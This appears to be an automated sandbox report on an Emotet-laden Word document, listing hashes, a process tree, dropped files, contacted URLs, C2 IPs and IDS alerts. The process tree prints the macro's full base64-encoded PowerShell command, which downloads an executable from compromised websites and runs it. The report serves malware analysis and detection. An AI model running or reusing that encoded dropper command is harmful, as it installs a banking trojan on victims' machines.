File name: | 0-TOU-2019-697936.doc |
Full analysis: | https://app.any.run/tasks/9a947ddf-cf15-4057-9bad-a07cfbebc6cf |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 15, 2019, 08:58:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 9 07:32:00 2019, Last Saved Time/Date: Thu May 9 07:32:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
MD5: | 7025E45671F6CD0B3FEF4A11D7659F96 |
SHA1: | 2FED57400207D905780396C9815AC10BCBA42C48 |
SHA256: | 0DB2072A0719D15F514B5FD212AB9444912E69E6336783343A992A194F236383 |
SSDEEP: | 3072:r77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qsQE1dS+XFLkvtb42:r77HUUUUUUUUUUUUUUUUUUUT52VeEiEC |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 7 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 7 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:05:09 06:32:00 |
CreateDate: | 2019:05:09 06:32:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2832 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0-TOU-2019-697936.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3416 | powErSHell -e JABqADcAMgA1ADQAMAA4AD0AJwBBADQAXwAyADMANAA3ACcAOwAkAFcANwA0ADIANwA2ACAAPQAgACcANAA0ACcAOwAkAGgANgA1ADgAMgAzADkAPQAnAE4ANQAyADIAOQA0ADYANQAnADsAJABOADQAOAAwADAAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVwA3ADQAMgA3ADYAKwAnAC4AZQB4AGUAJwA7ACQAdQA1ADgAOAA0ADAAOQA5AD0AJwBMADkAMgA1ADIAMgAnADsAJAB6ADYAMQA1ADQAMAAyADUAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAFQALgBXAGUAYABCAGMAYABMAEkAZQBgAE4AVAA7ACQASwA0ADcAMwAxADEAMAA0AD0AJwBoAHQAdABwAHMAOgAvAC8AdwBpAGgAYQBuAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA3AGcAaQA4AC8AQABoAHQAdABwAHMAOgAvAC8AaABhAHIAaQB0AGUALQBhAHIAZwBhAG4ALgBvAG4AbAB5AG8AbgBlAGkAZgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgA3ADYALwBAAGgAdAB0AHAAOgAvAC8AdgBpAGwAbABhAGcAZQBzAHQAdQBkAGkAbwAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AawBuAGMAZQB4AGoANQAwADQANgA4ADEALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGkAYQBuAGQAZQB2AGUAbABvAHAAZQByAHMALgBjAG8AbQAvAGIAbABvAGcAcwAvAHkAYwA2ADAAMwAwAC8AQABoAHQAdABwAHMAOgAvAC8AdQBzAHQAYQBtAHMAZQByAHYAaQBzAC4AbgBlAHQALwB5AGUAZABlAGsALwB6ADEAagA5ADYAMwA2ADIALwAnAC4AUwBQAEwASQB0ACgAJwBAACcAKQA7ACQAdwAxADIANgA1AF8APQAnAHYAMgAzADkAOABfACcAOwBmAG8AcgBlAGEAYwBoACgAJABrADgANgAwADIAMQA0ACAAaQBuACAAJABLADQANwAzADEAMQAwADQAKQB7AHQAcgB5AHsAJAB6ADYAMQA1ADQAMAAyADUALgBEAE8AdwBuAGwATwBBAEQARgBpAEwARQAoACQAawA4ADYAMAAyADEANAAsACAAJABOADQAOAAwADAAMQApADsAJABPAF8AMQA5ADEAOQA9ACcAZgAzADYANgA0ADgAMQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4ANAA4ADAAMAAxACkALgBsAGUAbgBnAFQAaAAgAC0AZwBlACAAMwAyADMAMQA2ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4ANAA4ADAAMAAxADsAJABZADIANwA0AF8AOAA9ACcAegA4ADcANAA2ADQAJwA7AGIAcgBlAGEAawA7ACQASQAyADIAMwAzADIAOAA4AD0AJwBXADMAMAAzADIANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADMAOQBfADEANAA5AD0AJwBoAF8AMwA4ADMAMgA2ADYAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3956 | "C:\Users\admin\44.exe" | C:\Users\admin\44.exe | — | powErSHell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
880 | --f9b6674a | C:\Users\admin\44.exe | 44.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2632 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 44.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3468 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE31.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3416 | powErSHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\34SKVHFRPNT5XULSBHR4.temp | — | |
MD5:— | SHA256:— | |||
3416 | powErSHell.exe | C:\Users\admin\44.exe | — | |
MD5:— | SHA256:— | |||
3416 | powErSHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121787.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$TOU-2019-697936.doc | pgc | |
MD5:CD04DC344AC842F02A393B321AA77AC6 | SHA256:B94E1F60138A056B7625313012C9014848C05B06FB8EFC25C86FA0192EDA910B | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5AB8FDB550CEF33A41135907EDACEA21 | SHA256:B313EC3B7731E49E8197F3027D1E9BB7650F7DE250BEC72E876D9FBE7B5D72C8 | |||
880 | 44.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:C032E789BE6923B376A055A04670ED38 | SHA256:8208F564963C1B1EC3DAC937603A9B4252577C5D828F1B4403B39BDB3EB2421F | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:8756142591BC409ACB378786286D1A30 | SHA256:633CE5DF7C8B502ED71BA62D162D24BDE15AE47ADAEC409FE3288B2E3B92B7E3 | |||
3416 | powErSHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3416 | powErSHell.exe | GET | 200 | 182.50.135.114:80 | http://www.miandevelopers.com/blogs/yc6030/ | SG | executable | 73.5 Kb | suspicious |
3468 | soundser.exe | POST | — | 181.16.127.226:443 | http://181.16.127.226:443/mult/loadan/ | AR | — | — | malicious |
3416 | powErSHell.exe | GET | 404 | 209.182.200.165:80 | http://villagestudio.net/wp-admin/kncexj504681/ | US | text | 2 b | malicious |
3468 | soundser.exe | POST | — | 201.217.67.3:80 | http://201.217.67.3/srvc/img/ringin/merge/ | EC | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3416 | powErSHell.exe | 188.166.193.247:443 | harite-argan.onlyoneif.com | Digital Ocean, Inc. | DE | unknown |
3416 | powErSHell.exe | 104.18.52.149:443 | wihanstudio.com | Cloudflare Inc | US | shared |
3416 | powErSHell.exe | 209.182.200.165:80 | villagestudio.net | InMotion Hosting, Inc. | US | malicious |
— | — | 201.217.67.3:80 | — | Satnet | EC | malicious |
3416 | powErSHell.exe | 182.50.135.114:80 | www.miandevelopers.com | GoDaddy.com, LLC | SG | suspicious |
3468 | soundser.exe | 181.16.127.226:443 | — | Ver Tv S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
wihanstudio.com |
| suspicious |
harite-argan.onlyoneif.com |
| unknown |
villagestudio.net |
| malicious |
www.miandevelopers.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3416 | powErSHell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3416 | powErSHell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3416 | powErSHell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3468 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 6 |
3468 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 15 |